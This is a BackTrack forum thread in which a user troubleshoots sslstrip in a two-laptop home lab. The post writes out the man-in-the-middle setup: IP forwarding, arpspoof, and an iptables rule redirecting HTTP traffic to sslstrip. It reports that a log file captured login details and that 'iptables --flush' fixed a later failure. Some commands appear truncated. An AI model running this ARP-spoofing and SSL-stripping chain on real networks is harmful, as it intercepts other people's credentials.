Results 1 to 1 of 1

Thread: problem with subsequent running of sslstrip

Threaded View

  1. #1
    Just burned his ISO
    Join Date
    Sep 2010

    Default problem with subsequent running of sslstrip


    I set up sslstrip on BT4 and it worked absolutely fine the first time (on my own home network). Set up is two laptops, attacker and victim.

    The commands are:
    cd sslstrip-0.7
    echo 1 > /proc/sys/net/ipv4/ip_forward

    (in other shell window)
    arpspoof -i eth0 -t

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    python -w logfile

    I then stopped the sslstrip session by entering ^C and then viewed the logfile which had all the correct info in it. I then shut down the attacker machine without killing any other processes (such as arpspoof), and put the victim laptop into sleep.

    Later, I tried to repeat the exercise, but it didnt work. On the victim machine, I was getting https login page with gmail, whereas in the first attempt it was http. Secondly, the logfile was empty. I tried several times since then, and rebooted the router, but still no luck.



    I figured it out. I needed to run "iptables --flush" at the root.
    Last edited by Archangel-Amael; 09-19-2010 at 02:29 PM.

Similar Threads

  1. Problem with running iin graphical mode
    By Manijak in forum Beginners Forum
    Replies: 2
    Last Post: 03-04-2010, 01:52 PM
  2. Error on running sslstrip 0.5
    By jkroeder in forum OLD Newbie Area
    Replies: 0
    Last Post: 09-13-2009, 11:52 PM
  3. Problem Running BT3 on Laptop
    By tzu00 in forum OLD Newbie Area
    Replies: 14
    Last Post: 01-23-2009, 04:29 PM
  4. Problem running Airodump on Ubuntu...
    By luthertrowe in forum OLD Newbie Area
    Replies: 2
    Last Post: 05-28-2008, 06:53 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts